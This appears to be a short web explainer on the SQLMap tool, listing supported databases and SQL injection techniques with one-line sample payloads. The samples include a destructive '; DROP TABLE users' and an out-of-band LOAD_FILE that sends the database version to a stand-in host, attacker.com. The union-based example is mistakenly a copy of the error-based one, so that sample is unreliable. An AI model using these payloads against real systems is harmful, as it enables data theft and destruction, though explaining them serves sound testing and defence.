SQLMap is the only penetration testing tool that can properly detect and exploit all known SQLi types.
Supported Databases
MySQL | Oracle | PostgreSQL | Microsoft SQL Server |
SQLite | IBM DB2 | Microsoft Access | Firebird |
Sybase | SAP MaxDB | Informix | MariaDB |
HSQLDB | CockroachDB | TiDB | MemSQL |
H2 | MonetDB | Apache Derby | Amazon Redshift |
Vertica, Mckoi | Presto | Altibase | MimerSQL |
CrateDB | Greenplum | Drizzle | Apache Ignite |
Cubrid | InterSystems Cache | IRIS | eXtremeDB |
FrontBase |
Techniques Used
B: Boolean-based blindE: Error-basedU: Union query-basedS: Stacked queriesT: Time-based blindQ: Inline queries
Boolean-based Blind SQLi
AND 1=1Differentiates TRUE from FALSE query results.
-
TRUEresults are generally based on responses having none or marginal difference to the regular server response. -
FALSEresults are based on responses having substantial differences from the regular server response.
Error-based SQLi
AND GTID_SUBSET(@@version,0)UNION query-based
AND GTID_SUBSET(@@version,0)Stacked queries
; DROP TABLE usersTime-based blind SQL Injection
AND 1=IF(2>1,SLEEP(5),0)Inline queries
SELECT (SELECT @@version) fromOut-of-band SQL Injection
LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))